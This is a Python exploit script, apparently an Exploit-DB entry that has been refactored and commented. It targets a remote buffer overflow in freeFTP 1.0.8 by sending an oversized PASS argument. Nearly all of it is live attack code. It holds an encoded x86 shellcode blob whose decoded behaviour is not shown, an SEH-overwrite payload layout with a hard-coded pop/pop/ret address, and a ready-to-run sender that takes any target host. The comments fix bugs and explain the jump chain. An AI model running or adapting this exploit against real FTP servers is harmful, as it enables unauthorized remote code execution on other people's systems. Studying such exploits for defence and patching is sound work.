freeFTP 1.0.8 - 'PASS' remote buffer overflow (freeFTP1.0.8-'PASS'远程缓冲区溢出)
# Exploit Title: freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow
# Date: 2019-09-01
# Author: Chet Manly
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
# Version: 1.0.8
# CVE: N/A
import sys
from ftplib import FTP
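# Encoded x86 payload carried inside the overflowing PASS argument.
#
# It is an opaque blob as far as this file goes: the leading bytes look like a
# GetPC + alphanumeric decoder stub (e.g. msfvenom x86/alpha_mixed), but what
# the decoded code does on the target is not visible here.  For any authorized
# test, regenerate a payload you control instead of running unknown shellcode.
#
# The original listing assigned this blob to `buf` and then overwrote `buf`
# before referencing an undefined `shellcode`, and it had a space after every
# escape (extraction artefact) that would have been sent literally and
# corrupted the bytes.  Both are fixed here.
SHELLCODE = (
    b"\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
    b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
    b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
    b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
    b"\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
    b"\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
    b"\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
    b"\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
    b"\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
    b"\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
    b"\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
    b"\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
    b"\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
    b"\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
    b"\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
    b"\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
    b"\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
    b"\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
    b"\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
    b"\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
    b"\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
    b"\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
    b"\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
    b"\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
    b"\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
    b"\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
    b"\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
    b"\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
    b"\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
    b"\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
    b"\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
    b"\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
    b"\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
    b"\x45\x35\x53\x30\x41\x41"
)

# Layout constants, taken verbatim from the original hard-coded offsets.
SHELLCODE_SLOT = 486         # bytes reserved for shellcode + 'B' filler
PAYLOAD_LEN = 1000           # total length of the PASS argument sent
# 0x00423dc0, little-endian: the original comment calls it "pop, pop, ret".
# It is a fixed address, so it is presumably specific to the freeFTP 1.0.8
# build the author tested against -- verify against your own copy.
PPR_ADDR = b"\xc0\x3d\x42\x00"


def build_payload(shellcode=SHELLCODE, total_len=PAYLOAD_LEN):
    """Return the PASS argument that hijacks control flow and reaches *shellcode*.

    Byte layout of the returned buffer (offsets reproduce the original script):

      0    'A' * 276                      filler; the stub below jumps back here
      276  '\\x90' * 10                    NOP sled
      286  shellcode, then 'B' filler up to offset 772
      772  pop eax / dec ah / dec ah / jmp eax
      779  'C' * 4
      783  call -16   (e8 f0 ff ff ff)    pushes 788, lands on the pop eax at 772
      788  'D' * 9
      797  jmp short -16 (eb f0) + 2 NOPs  lands on the call at 783
      801  PPR_ADDR                        hard-coded pop/pop/ret, ends in a NUL
      805  'E' filler up to *total_len*

    Chain: the short jump at 797 reaches the call at 783; the call pushes the
    address of offset 788 and jumps to 772; `pop eax` recovers that address
    and the two `dec ah` subtract 0x200 from it (788 - 512 = 276), so `jmp eax`
    lands on the NOP sled.  NOTE(review): `dec ah` does not borrow into the
    upper bytes, so this only works if `ah` of the pushed address is >= 2 --
    confirm on the target.  The jump-then-pop/pop/ret shape at 797/801 is the
    usual SEH-overwrite idiom; the original does not say so explicitly.

    Args:
        shellcode: raw bytes to place after the NOP sled; must fit in the
            486-byte slot (the original silently produced a broken layout
            when it did not, because ``'B' * negative`` is empty).
        total_len: final buffer length; the remainder is 'E' filler.

    Returns:
        bytes of length *total_len*.

    Raises:
        ValueError: if *shellcode* exceeds the slot or *total_len* is too
            small to hold the fixed part (805 bytes).
    """
    if len(shellcode) > SHELLCODE_SLOT:
        raise ValueError(
            "shellcode is %d bytes, slot is %d" % (len(shellcode), SHELLCODE_SLOT)
        )
    parts = [
        b"A" * 276,
        b"\x90" * 10,
        shellcode,
        b"B" * (SHELLCODE_SLOT - len(shellcode)),
        b"\x58",                   # pop eax
        b"\xfe\xcc",               # dec ah
        b"\xfe\xcc",               # dec ah
        b"\xff\xe0",               # jmp eax
        b"C" * 4,
        b"\xe8\xf0\xff\xff\xff",   # call near -16
        b"D" * 9,
        b"\xeb\xf0\x90\x90",       # jmp short -16, padded with two NOPs
        PPR_ADDR,
    ]
    fixed = b"".join(parts)
    if len(fixed) > total_len:
        raise ValueError(
            "fixed part is %d bytes, total_len is %d" % (len(fixed), total_len)
        )
    return fixed + b"E" * (total_len - len(fixed))


def send_exploit(host, port=21, user="anonymous", payload=None, timeout=10):
    """Connect to *host*:*port* and log in with *payload* as the password.

    The original script was Python 2, where ``str`` was already bytes.  On
    Python 3 ``ftplib`` encodes the password with ``FTP.encoding`` before
    sending; since 3.9 that defaults to UTF-8, which would turn every byte
    >= 0x80 into two bytes and wreck the offsets above.  Forcing latin-1 on
    the connection and decoding the payload as latin-1 gives an exact 1:1
    byte mapping on the wire.

    Args:
        host: target address.
        port: target port (default 21).
        user: USER sent before the overflowing PASS.
        payload: raw bytes to send as PASS; defaults to ``build_payload()``.
        timeout: socket timeout in seconds, so a dead server does not hang us.

    Raises:
        Whatever ``ftplib``/the socket raises; a connection reset or EOF after
        PASS is the expected outcome if the server crashed.
    """
    if payload is None:
        payload = build_payload()
    ftp = FTP()
    ftp.encoding = "latin-1"   # 1:1 byte mapping regardless of Python version
    ftp.connect(host, port, timeout)
    try:
        ftp.login(user, payload.decode("latin-1"))
    finally:
        ftp.close()


if __name__ == "__main__":
    # Usage: python <script> [host] [port].  With no arguments this keeps the
    # original's hard-coded lab target so existing invocations still work.
    target_host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 21
    send_exploit(target_host, target_port)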